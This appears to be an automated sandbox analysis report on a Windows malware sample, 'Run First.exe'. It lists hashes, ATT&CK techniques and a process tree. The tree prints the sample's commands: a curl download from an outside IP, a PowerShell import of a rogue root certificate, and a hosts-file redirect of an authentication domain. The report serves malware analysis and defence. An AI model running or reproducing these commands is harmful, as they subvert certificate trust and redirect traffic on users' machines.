5b05b1d4dc439d81003bc6fe8348716667070b69825222b2e0a9f91d66f86616

Analysis

max time kernel
391s
max time network
455s
platform
windows10-2004_x64
resource
win10v2004-20240412-de
resource tags

arch:x64arch:x86image:win10v2004-20240412-delocale:de-deos:windows10-2004-x64systemwindows
submitted
20-04-2024 15:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Run First.exe
Size

896KB
MD5

3df354a50e13f7316e44b01739f99f2e
SHA1

a1d1c697cadecbab3c043259acae1c162e767f96
SHA256

5b05b1d4dc439d81003bc6fe8348716667070b69825222b2e0a9f91d66f86616
SHA512

25242ca3eb37d73e40df0682cc6e948f3d01b9741969de081edb7086b25dc064937cb4364b00882da5e78166c94d544ce1c54792b919c561593c70b0da842708
SSDEEP

12288:oqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaETy:oqDEvCTbMWu7rQYlBQcBiT6rprG8aky

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\k.bat	Run First.exe
File created	C:\Windows\SysWOW64\server.crt	curl.exe
File created	C:\Windows\SysWOW64\k.bat	Run First.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4284	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3544	powershell.exe
3544	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3544	powershell.exe

Suspicious use of FindShellTrayWindow 15 IoCs

pid	Process
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe

Suspicious use of SendNotifyMessage 15 IoCs

pid	Process
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe
1180	Run First.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1180 wrote to memory of 1380	1180	Run First.exe	85
PID 1180 wrote to memory of 1380	1180	Run First.exe	85
PID 1180 wrote to memory of 1380	1180	Run First.exe	85
PID 1380 wrote to memory of 2952	1380	cmd.exe	87
PID 1380 wrote to memory of 2952	1380	cmd.exe	87
PID 1380 wrote to memory of 2952	1380	cmd.exe	87
PID 2952 wrote to memory of 3964	2952	cmd.exe	88
PID 2952 wrote to memory of 3964	2952	cmd.exe	88
PID 2952 wrote to memory of 3964	2952	cmd.exe	88
PID 1380 wrote to memory of 3984	1380	cmd.exe	92
PID 1380 wrote to memory of 3984	1380	cmd.exe	92
PID 1380 wrote to memory of 3984	1380	cmd.exe	92
PID 1380 wrote to memory of 3416	1380	cmd.exe	93
PID 1380 wrote to memory of 3416	1380	cmd.exe	93
PID 1380 wrote to memory of 3416	1380	cmd.exe	93
PID 1380 wrote to memory of 1376	1380	cmd.exe	94
PID 1380 wrote to memory of 1376	1380	cmd.exe	94
PID 1380 wrote to memory of 1376	1380	cmd.exe	94
PID 1380 wrote to memory of 2196	1380	cmd.exe	95
PID 1380 wrote to memory of 2196	1380	cmd.exe	95
PID 1380 wrote to memory of 2196	1380	cmd.exe	95
PID 1380 wrote to memory of 1112	1380	cmd.exe	96
PID 1380 wrote to memory of 1112	1380	cmd.exe	96
PID 1380 wrote to memory of 1112	1380	cmd.exe	96
PID 1380 wrote to memory of 3544	1380	cmd.exe	97
PID 1380 wrote to memory of 3544	1380	cmd.exe	97
PID 1380 wrote to memory of 3544	1380	cmd.exe	97
PID 1380 wrote to memory of 2620	1380	cmd.exe	99
PID 1380 wrote to memory of 2620	1380	cmd.exe	99
PID 1380 wrote to memory of 2620	1380	cmd.exe	99
PID 1380 wrote to memory of 4284	1380	cmd.exe	100
PID 1380 wrote to memory of 4284	1380	cmd.exe	100
PID 1380 wrote to memory of 4284	1380	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\Run First.exe
"C:\Users\Admin\AppData\Local\Temp\Run First.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\k.bat
  2⤵
  - Drops file in Drivers directory
  - Suspicious use of WriteProcessMemory
  PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c curl -s https://raw.githubusercontent.com/Suryajung8/aaaaaaaa/main/tori.xyzzz
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\SysWOW64\curl.exe
      curl -s https://raw.githubusercontent.com/Suryajung8/aaaaaaaa/main/tori.xyzzz
      4⤵
      PID:3964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo 31.44.2.15 "
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\curl.exe
    curl -s -o "C:\Windows\System32\server.crt" "http://31.44.2.15/server.crt"
    3⤵
    - Drops file in System32 directory
    PID:1376
- - C:\Windows\SysWOW64\certutil.exe
    certutil -store TrustedRoot
    3⤵
    - Manipulates Digital Signatures
    PID:2196
- - C:\Windows\SysWOW64\findstr.exe
    findstr /i /c:"C:\Windows\System32\server.crt"
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath 'C:\Windows\System32\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Windows\SysWOW64\findstr.exe
    findstr /C:"31.44.2.15 api.valveauthentication.xyz" "C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:4284

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qehegl53.imz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\SysWOW64\k.bat

Filesize
1010B

MD5
cd4130fd318d21dcddbee0d7829cf258

SHA1
dc5a2f65c5b26f2cba1c3214760c00e05358ea51

SHA256
426a5f5e2d51f72dd1085102b437d0c1751da2f33374d2d8deff6e92e3e77a81

SHA512
7184a2e9d92dba35b50fa7f57b79af65e93453b11c50b098ecfb10f349d8484fb33b84b524ccb7ce64d66b4d7bd7a499877caabb7845025fe0d9d7a467e0616c

Download Submit
C:\Windows\SysWOW64\server.crt

Filesize
1KB

MD5
a194b7261950195efb93578c313812c7

SHA1
118754d76e28366ca28bbdf72a1604c00eaf5765

SHA256
0828f1a3a5a52a230f026fa4323b9840d8377a425bcf4ff9f4a81546275b4e1b

SHA512
69fcd998cbd878b2cc1b5da5558f0b2182d9239352bec43c2ad92d2a2c7e4f84abf5a93c36df1daefa5edf3d2a1552aee5c5edf760e2abb6c59bef103c816c37

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
5B

MD5
ec92700e9dd452ac45503ce6e98f11a3

SHA1
718b0059b629b63dc87bd3ef892f76f6e1371705

SHA256
688787fbb991b11b4e767d01c6da762e35a9aa8fdf3b2e74bf44d658f04c3067

SHA512
ed31b3af22a5b0718a3dc551d3cd9661972f1bd56af760d1edd977fb87b3c38195d1338bf86492560f6d157ea2d80a7b676927c557f26750846e2d85b1e55c7e

Download Submit
memory/3544-30-0x000000007EE90000-0x000000007EEA0000-memory.dmp

Filesize
64KB

Download
memory/3544-31-0x0000000007910000-0x0000000007942000-memory.dmp

Filesize
200KB

Download
memory/3544-12-0x00000000056F0000-0x0000000005776000-memory.dmp

Filesize
536KB

Download
memory/3544-13-0x0000000005880000-0x00000000058A2000-memory.dmp

Filesize
136KB

Download
memory/3544-10-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/3544-14-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/3544-20-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/3544-25-0x0000000006380000-0x00000000066D4000-memory.dmp

Filesize
3.3MB

Download
memory/3544-26-0x00000000061C0000-0x00000000061D0000-memory.dmp

Filesize
64KB

Download
memory/3544-27-0x00000000067F0000-0x00000000068F4000-memory.dmp

Filesize
1.0MB

Download
memory/3544-28-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/3544-29-0x0000000006A00000-0x0000000006A4C000-memory.dmp

Filesize
304KB

Download
memory/3544-7-0x00000000051B0000-0x00000000051E6000-memory.dmp

Filesize
216KB

Download
memory/3544-11-0x0000000005940000-0x0000000005F68000-memory.dmp

Filesize
6.2MB

Download
memory/3544-32-0x0000000070190000-0x00000000701DC000-memory.dmp

Filesize
304KB

Download
memory/3544-42-0x0000000006F10000-0x0000000006F2E000-memory.dmp

Filesize
120KB

Download
memory/3544-43-0x0000000007950000-0x00000000079F3000-memory.dmp

Filesize
652KB

Download
memory/3544-44-0x00000000082D0000-0x000000000894A000-memory.dmp

Filesize
6.5MB

Download
memory/3544-45-0x0000000007C90000-0x0000000007CAA000-memory.dmp

Filesize
104KB

Download
memory/3544-46-0x0000000007D00000-0x0000000007D0A000-memory.dmp

Filesize
40KB

Download
memory/3544-47-0x0000000007ED0000-0x0000000007F1A000-memory.dmp

Filesize
296KB

Download
memory/3544-48-0x0000000007FC0000-0x0000000008056000-memory.dmp

Filesize
600KB

Download
memory/3544-49-0x0000000007EB0000-0x0000000007EC1000-memory.dmp

Filesize
68KB

Download
memory/3544-50-0x0000000007F20000-0x0000000007F5E000-memory.dmp

Filesize
248KB

Download
memory/3544-51-0x0000000006F40000-0x0000000006F4A000-memory.dmp

Filesize
40KB

Download
memory/3544-9-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/3544-55-0x0000000073D30000-0x00000000744E0000-memory.dmp

Filesize
7.7MB

Download
memory/3544-8-0x0000000073D30000-0x00000000744E0000-memory.dmp

Filesize
7.7MB

Download